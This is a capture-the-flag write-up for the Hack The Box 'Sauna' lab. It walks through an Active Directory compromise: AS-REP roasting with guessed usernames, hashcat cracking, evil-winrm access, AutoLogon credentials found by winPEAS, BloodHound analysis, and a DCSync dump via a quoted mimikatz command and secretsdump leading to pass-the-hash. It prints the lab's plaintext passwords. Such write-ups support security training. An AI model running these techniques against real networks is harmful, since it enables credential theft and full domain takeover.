Sauna is an easy Windows box. During the enumeration of the exposed web application, we found a list of potential usernames. We used those usernames and performed an AS-REP Roasting attack on the Kerberos service. The attack was successful and we obtained the password of the user by cracking the retrieved hash. We then used this user to gain initial foothold in the system. After some further enumeration, we discovered that another user had AutoLogon enabled, which allowed us to read his/her credentials in plaintext. This gave us access to the system as a somewhat more privileged user. Using SharpHound/BloodHound we then discovered that it was possible to execute a DSync attack as the user had the GetChanges and GetChangesAll permissions. Due to that, we were able to retrieve all user hashes of the system - including the hash of the Administrator account, which finally gave us access to the system using Pass-The-Hash.
Enumeration
As always, we start by scanning the target machine’s open ports:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
rustscan --ulimit 5000 sauna.htb -- sV -sC -oN nmap_scan
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2022-06-20 19:22:04Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49699/tcp open msrpc syn-ack Microsoft Windows RPC
49719/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
The nmap output shows several open which are very typical for a Windows Server.
Enumeration Port 80 - Microsoft IIS
The websites looks like it belongs to some kind of bank called Repay.
The page itself is static and contains lots of filler text. The buttons show no functionality. All blog article links lead to the same pre-generated site. However, looking at the “About Us” page, we get a few names of the team members.
We take note of those name. Maybe they will be useful later:
1
2
3
4
5
6
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb
Enumeration Port 135 - RPC
Using rpcclient to connect to the open RPC port only reveals the Domain Name: EGOTISTICALBANK. All other attempts to request any further information results in ACCESS_DENIED.
Enumeration Port 139/445 - SMB
All attempts to enumerate the SMB service failed:
AS-REP Roasting
So what information do we have? The inital enumeration did not reveal much. All we’ve got at the moment is a list of names. But we don’t really know whether they are also just filler values or actual members of the team. What we can do now is to create possible usernames out of those full names and try to request a TGT at the server (in hope that one of those guessed usernames has pre-authentication disabled).
My first guess was to follow the pattern [firstname][lastname]. However, this did not result in any success. My second approach was to use the pattern [first character of firstname][lastname]. This resulted in the following list of names:
1
2
3
4
5
6
fsmith
scoins
hbear
btaylor
sdriver
skerb
This time, we are lucky! We get the asrep for the user fsmith! This user does not have pre-authentication enabled.
Cracking the password hash
Now that we have the asrep, we can try to crack the password of the user fsmith.
1
2
┌──(kali㉿kali)-[~/HTB/machines/sauna]
└─$ hashcat -m 18200 asrep_fsmith /usr/share/wordlists/rockyou.txt
It’s successfuly! Hashcat is able to recover the password: fsmith:Thestrokes23
Initial Foothold
We can now use these credentials to log in to the server via Port 5985 - using Evil-WinRM.
1
2
┌──(kali㉿kali)-[~/HTB/machines/sauna]
└─$ evil-winrm -i 10.129.86.24 -u fsmith -p 'Thestrokes23'
Privilege Escalation - user svc_loanmgr
For privilege escalation, we first have to get to know the system. Thus, we have to enumerate the system. Therefore we use the tool winPEAS.exe.
1
Evil-WinRM* PS C:\temp_babbadeckl> ./winPEAS.exe cmd fast > sauna_winpeas_fast
Next, we transfer the output file to our attacker machine (using e.g. an smb server on the attacker machine), such that we can investigate it locally.
Looking through the winPEAS output, we discover that there is an account with AutoLogon enabled. Further the account’s credentials are visible in plaintext:
The found credentials are: EGOTISTICALBANK\svc_loanmanager:Moneymakestheworldgoround!
We can use these credentials, to again log in to the system using Evil-WinRM. But …. it does not work?
So what’s the issue? This actually took me quite some time to figure out as I expected the credentials to be correct. However, it turns out that the username is wrong. If we look at the net users output, we can clearly see what’s wrong:
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\FSmith\Documents> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The user is called svc_loanmgr instead of svc_loanmanager as presented in the WinPEAS output!
After adjusting the username, we can successfully log in.
Privilege Escalation - user Administrator
First, we have to find an attack vector. For that, we use the tool SharpHound in combination with BloodHound. We transfer the SharpHound.exe onto the system via a hosted HTTP server on the attacker machine. Next, we use the command .\SharpHound.exe to start the data collection. Once it’s done, we transfer the resulting .zip to our attacker machine SMB and load it into BloodHound.
Inspecting the gathered data, we can obtain the following information: our current user svc_loanmgr has the GetChanges as well as the GetChangesAll privileges.
BloodHound also gives us the following information about these privileges:
1
2
3
4
5
6
7
8
9
The user SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL has the DS-Replication-Get-Changes-All privilege on the domain EGOTISTICAL-BANK.LOCAL.
Individually, this edge does not grant the ability to perform an attack. However, in conjunction with DS-Replication-Get-Changes, a principal may perform a DCSync attack.
With both GetChanges and GetChangesAll privileges in BloodHound, you may perform a dcsync attack to get the password hash of an arbitrary principal using mimikatz:
lsadump::dcsync /domain:testlab.local /user:Administrator
You can also perform the more complicated ExtraSids attack to hop domain trusts. For information on this see the blod post by harmj0y in the references tab.
Great! So we can perform a DSync attack!
“DCSync is an attack that allows an adversary to simulate the behavior of a domain controller (DC) and retrieve password data via domain replication. The DCSYNC attack works as follows:
- The attacker discovers a domain controller to request replication.
- The attacker requests user replication using the GetNCChanges
- The DC returns replication data to the requestor, including password hashes.” . Source
We can either do that, as BloodHound told us, using mimikatz or we simply use Impacket's secretsdump.py. Here, we use the latter:
This gives us the hashes of all users on the system, including the Administrator. We can now use that hash to log in to the system using evil-winrm.
